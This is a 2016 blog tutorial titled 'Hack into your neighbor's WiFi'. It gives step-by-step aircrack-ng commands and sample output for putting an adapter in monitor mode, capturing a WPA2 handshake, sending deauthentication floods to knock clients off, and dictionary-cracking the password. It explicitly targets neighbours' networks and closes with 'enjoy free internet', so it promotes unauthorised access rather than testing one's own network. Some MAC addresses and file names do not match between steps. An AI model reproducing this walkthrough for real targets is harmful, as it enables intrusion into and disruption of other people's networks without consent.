Call Us : +91-771045-0011 | +91-771045-0022

HACK INTO YOUR NEIGHBOR'S WIFI

2016-09-20

Category : Network security

One on the most asked questions on internet now a days is, How to hack a WiFi? It is possible sometimes, when your neighbors are not using enough security methods for their WiFi. Here is a step by step guide, to hack a WiFi:

Getting yours neighbor’s wifi password

In this tutorial we will learn to crack WPA/WPA2 Wi-Fi passwords which use PSK encryption.

In this tutorial we will need the following tools:

1. Airmon-ng

2. Airodump-ng

3. Aireplay-ng for deauthenticating the wireless client.

4.Aircrack-ng for cracking the WPA/WPA2-PSK using the authentication handshake

Step 1

Check whether you have airmon-ng installed or not(always prefer the latest version)

If yes then skip this step and if no then you need to download .

Follow the below procedure :

Command line

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Or download by clicking on airmon-ng

Command line :

for current version :

------------------------------------------------------------------------------------------------

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz

tar -zxvf aircrack-ng -1.2-rc4.tar.gz

cd aircrack-ng -1.2-rc4

make

make install

-------------------------------------------------------------------------------------------------



STEP 2

Now lets start with our command line :

We need to find if any other processes are going on or not ???

------------------------------------------------------------------------------------------------

$ sudo airmon-ng check kill

------------------------------------------------------------------------------------------------

For wireless interface mode :

-----------------------------------------------------------------------------------------------

$ sudo airmon-ng start wlan0

-----------------------------------------------------------------------------------------------

Notice that whether airmon-ngenabled monitor-mode :

----------------------------------------------------------------------------------------------

Interface                                        Chipset                                   Driver

wlan0                                        Intel2065                                  wifi-[phy0]

                                                                                                     (monitor mode enabled on mon0)

------------------------------------------------------------------------------------------------

STEP 3:

Start airdomp-ng for authentication handshake

After starting this we are capable to see all the wireless traffic .

Command line:

---------------------------------------------

$ sudo airodump-ng mon0

-------------------------------------------------------------------------------------------------

Here APs are listed in the upper part and the clients are listed in the lower part

------------------------------------------------------------------------------------------------

CH 1 ][ Elapsed: 50 s ][ 2016-09-19 10:26

BSSID                   PWR       Beacons   #Data,     #/s     CH    MB  ENC   CIPHER AUTH ESSID

11:10:25:83:94:45    -46    312        1136        56         1       54e WPA2 CCMP PSK CrackMe

66:77:88:99:00:11    -64      134       345        34         1        54e WPA2 CCMP P S SomeAP



BSSID                             STATION                          PWR     Rate     Lost Frames Probe

00:11:22:33:44:55      AA:BB:CC:DD:EE:FF      -44 0     - 1         114    56

00:11:22:33:44:55      GG:HH:II:JJ:KK:LL          -78 0    - 1          0          1

66:77:88:99:00:11      MM:NN:OO:PP:QQ:RR -78 2     - 32          0        1

------------------------------------------------------------------------------------------------

Start airodump-ng on AP channel with BSSID for authentication handshake on the target you are going to attack

------------------------------------------------------------------------------------------------

$ sudo airodump-ng -c 1 --bssid11:10:25:83:94:45 -w psk mon0 --ignore-negative-one

-------------------------------------------------------------------------------------------------

Here the words used represent the following things

· -c                            Channel for the wireless network

· --bssid                    Mac address of the Aps

· -w                           The file name prefix which will store the authentication handshake

· Mon0                       It is the wireless interface

· --ignore-negative-one      Removes 'fixed channel : -1' message

After done with all above wait until airodump-ng captures a handshake

In mean while you'll notice the WPA handshake: 11:10:25:83:94:45 in the top right-hand corner of the screen

It means that airodump-ng  has successfully captured the handshake

------------------------------------------------------------------------------------------------

CH 1 ] [ Elapsed: 80 s ] [ 2016-09-19 11:26 WPA handshake: 11:10:25:83:94:45

BSSID             PWR          Beacons          #Data,    #/s  CH    MB    ENC    CIPHER   AUTH ESSID

11:10:25:83:94:45 -46     312                1136        56    1      54e   WPA2  CCMP PSK CrackMe


BSSID                        STATION                         PWR    Rate    Lost Frames Probe

11:10:25:83:94:45 AA:BB:CC:DD:EE:FF      -44         0 - 1   114  56

-------------------------------------------------------------------------------------------------

STEP 4:

Now use Aireplay-ng to Deauthenticate the Wireless Client –

Command line

-------------------------------------------------------------------------------------------------

$ sudo aireplay-ng --deauth 100 -a11:10:25:83:94:45 mon0 --ignore-negative-one

--------------------------------------------

To effectively target the attack

---------------------------------------------

$ sudo aireplay-ng --deauth 100 -a11:10:25:83:94:45 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

-------------------------------------------------------------------------------------------------


Command used here represent the following meaning

--deauth 100                   The number of de-authenticate frames

-a                                         The MAC address of the access point

-c                                          The MAC address of the client

mon0                                   wireless interface

--ignore-negative-one       Removes 'fixed channel : -1' message


Run Aircrack-ng to Crack WPA/WPA2-PSK

For cracking the wifi password we need a dictionary (for dictionary attack) or wordlist .Which you can download from internet.



---------------------------------------------

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 psk.cap

---------------------------------------------

Here

WPAcrack.cap The name of the file that contains the authentication handshake

Terminal view:

---------------------------------------------

Aircrack-ng 1.2 beta3 r2393

[00:09:10] 548872 keys tested (1425.24 k/s)

                                        KEY FOUND! [ 456456456 ]

Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97

CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5

Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8

AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6

DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9

A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3

EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

-------------------------------------------------------------------------------------------------

HURRAHHHH we got the password ‘456456456’ .

Now connect and enjoy free internet.

################################################################

Thanks for reading and keep sharing .

###############################################################



Contact Us

+91-771045-0011

Request more information

suggested for you

Proudly Operated from India

© 2016 Copyrights. All Rights Reserved

See more of Cyber Intelligence by logging in.
Connect with cyber security experts,Discover job opportunities,Online Training, Information Security Advisory and lot more.

Sign Up Log In